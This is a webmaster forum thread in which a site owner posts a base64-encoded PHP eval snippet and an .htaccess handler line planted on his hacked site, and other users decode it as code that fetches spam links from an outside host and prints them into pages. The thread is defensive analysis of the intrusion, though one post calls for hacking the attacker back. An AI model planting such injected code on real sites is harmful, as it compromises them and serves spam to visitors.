Help someone hacked my site : Please help me decipher code : !!!!!!!!!!!!!!!!!!!!!!!!

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • NetHorse
    Confirmed User
    • Dec 2006
    • 3526

    #1

    Help someone hacked my site : Please help me decipher code : !!!!!!!!!!!!!!!!!!!!!!!!

    <!--erda8--><?php eval(base64_decode("JGw9Imh0dHA6Ly9kbWkuZXJkYXVkdG VhbS5iaXovbGluay9saW5rLnBocCI7IGlmIChleHRlbnNpb25f bG9hZGVkKCJjdXJsIikpey ANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gs IENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2 gsIENVUkxPUFRfUkVUVVJO VFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE 9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3Vy bF9jbG9zZSgkY2gpO30NCm Vsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBA JHI7DQo=")); ?>

    Someone gained access to one of my sites that promotes a nats program and added that little script. Any idea what that means or what it was possibly doing? Thanks to anyone out there who can help.
    ┌∩┐(◣_◢)┌∩┐
    ICQ # 427013273
  • DarkJedi
    No Refunds Issued.
    • Feb 2001
    • 28301

    #2
    It means you need to move to a new host that doesn't have a head up their ass.

    Comment

    • NetHorse
      Confirmed User
      • Dec 2006
      • 3526

      #3
      Also found this is in all my .htaccess files


      AddHandler application/x-httpd-php .html .htm .shtm

      and huge spam list linking to this site

      http://www.evolutionisdead.com/

      ????????
      ┌∩┐(◣_◢)┌∩┐
      ICQ # 427013273

      Comment

      • darksoul
        Confirmed User
        • Apr 2002
        • 4997

        #4
        Code:
        $l="http://dmi.erdaudteam.biz/link/link.php"; if (extension_loaded("curl")){ $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);} else{$r=implode("",file($l));} print @$r;
        1337 5y54|)m1n: 157717888
        BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
        Cambooth

        Comment

        • beta-tester
          Rock 'n Roll Baby!
          • Sep 2004
          • 22562

          #5
          it means that it'll execute this statement:

          $l="http://dmi.erdaudteam.biz/link/link.php"; if (extension_loaded("curl")){
          $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
          curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}
          else{$r=implode("",file($l));} print @$r;


          if it helps

          Sig for sale. Affordable prices. Contact me and get a great deal ;)

          My contact:
          ICQ: 944-320-46
          e-mail: manca {AT} HotFreeSex4All.com

          Comment

          • darksoul
            Confirmed User
            • Apr 2002
            • 4997

            #6
            basically it loads the list with spammed url'es from dmi.erdaudteam.biz/link/link.php
            1337 5y54|)m1n: 157717888
            BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
            Cambooth

            Comment

            • NetHorse
              Confirmed User
              • Dec 2006
              • 3526

              #7
              Thanks a lot guys I'll try to get a hold of this guy's host and have him shut down
              ┌∩┐(◣_◢)┌∩┐
              ICQ # 427013273

              Comment

              • NetHorse
                Confirmed User
                • Dec 2006
                • 3526

                #8
                estdomains.com is the domain the site is hosted on!
                ┌∩┐(◣_◢)┌∩┐
                ICQ # 427013273

                Comment

                • NetHorse
                  Confirmed User
                  • Dec 2006
                  • 3526

                  #9
                  If they don't do anything about it can I contact ICANN? I want this asshole's site SHUT DOWN!!!!!!!!!!!!
                  ┌∩┐(◣_◢)┌∩┐
                  ICQ # 427013273

                  Comment

                  • tahiti
                    Confirmed User
                    • Oct 2003
                    • 699

                    #10
                    so easy was some base64 encode.

                    --->aWYgeW91IG5lZWQgaGVscCBjaGVjayBteSBzaWcuLi4gSSBnd WVzcyB5b3UgY2FuJ3QgcmVhZCB0aGF0IDstKQ==
                    -------------------------------
                    Oliver Smith
                    "Drunk Russian Hackers are Invincible"
                    ASCII P0rn rules
                    aim: olvrsmt
                    icq: 21018030

                    Comment

                    • NetHorse
                      Confirmed User
                      • Dec 2006
                      • 3526

                      #11
                      blah someone hack his site. POS really fucked one of my rankings with one site.
                      ┌∩┐(◣_◢)┌∩┐
                      ICQ # 427013273

                      Comment

                      • Juicy D. Links
                        So Fucking Banned
                        • Apr 2001
                        • 122992

                        #12
                        thats some nice code

                        Comment

                        • NetHorse
                          Confirmed User
                          • Dec 2006
                          • 3526

                          #13
                          Originally posted by Juicy D. Links
                          thats some nice code
                          ? Meaning these are talented hackers?
                          ┌∩┐(◣_◢)┌∩┐
                          ICQ # 427013273

                          Comment

                          Working...